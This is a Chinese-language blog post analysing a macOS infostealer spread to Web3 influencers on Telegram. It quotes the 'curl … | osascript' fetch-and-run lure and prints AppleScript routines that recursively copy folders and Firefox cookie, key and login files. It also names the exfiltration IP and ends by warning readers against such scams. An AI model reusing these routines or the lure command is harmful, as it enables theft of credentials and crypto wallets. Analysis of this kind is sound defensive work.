记录一次Web3链上骗子诈骗过程

这几天在tg上发现了一些专门诈kol的骗子，他们大多数都是以发推推广或者返佣形式来骗取kol的钱包等信息，并且诈骗手段极其弱智与无脑，说白了只有傻逼才会上当他们所用的手法。

大概一周前，有人在tg发了一条用osascript执行一个脚本的命令，然后附上了使用这条命令就能获得一些信息，链接大概是这样子的

curl http://whitexxx.xxxxxxx/xxxxxx.xxxx | osascript

当被害者输入这条命令后，会自动下载一个applescript脚本，然后用osascript来执行，这个脚本非常无脑，你甚至还能在其中看到LLM生成的痕迹，只能说这个年代还用脚本来钓鱼的真的是脑子有点😅

脚本会自动化收集被害者系统上的文件，大多数都是有关Web3的，执行这个脚本后会在后台静默执行

这个脚本主要递归遍历文件和文件夹以及系统上的一些敏感信息，遍历文件夹甚至还有排除选项，看来是为了不让服务器塞入一些没用的东西

on GrabFolderLimit(sourceFolder, destinationFolder)
	try
		set bankSize to 0
		set exceptionsList to {".DS_Store", "Partitions", "Code Cache", "Cache", "market-history-cache.json", "journals", "Previews"}
		set fileList to list folder sourceFolder without invisibles
		mkdir(destinationFolder)
		repeat with currentItem in fileList
			if currentItem is not in exceptionsList then
				set itemPath to sourceFolder & "/" & currentItem
				set savePath to destinationFolder & "/" & currentItem
				if isDirectory(itemPath) then
					GrabFolderLimit(itemPath, savePath)
				else
					set fsz to filesizer(itemPath)
					set bankSize to bankSize + fsz
					if bankSize < 10 * 1024 * 1024 then
						readwrite(itemPath, savePath)
					end if
				end if
			end if
		end repeat
	end try
end GrabFolderLimit

最主要的是自动搜集浏览器敏感数据例如Cookie、密码（以文件存储的形式）

on parseFF(firefox, writemind)
	try
		set myFiles to {"/cookies.sqlite", "/formhistory.sqlite", "/key4.db", "/logins.json"}
		set fileList to list folder firefox without invisibles
		repeat with currentItem in fileList
			set fpath to writemind & "ff/" & currentItem
			set readpath to firefox & currentItem
			repeat with FFile in myFiles
				readwrite(readpath & FFile, fpath & FFile)
			end repeat
		end repeat
	end try
end parseFF

然后就是一系列的Chrome插件和浏览器数据窃取，Telegram劫持，以及桌面钱包应用窃取

最后就是把上面搜刮到的文件打包成out.zip发送到45.13.225.235这个IOC

接着就是清理痕迹

只能说这个诈骗手段放在10～16年那会bat时代还有人上当受骗，现在的话用这种还是太过时了，也是希望大家别打开陌生人发过来的钓鱼链接，包括但不限于淘宝一些用irm激活或者咸鱼上让你打开powershell用certutil下东西的

真好，又水一篇😋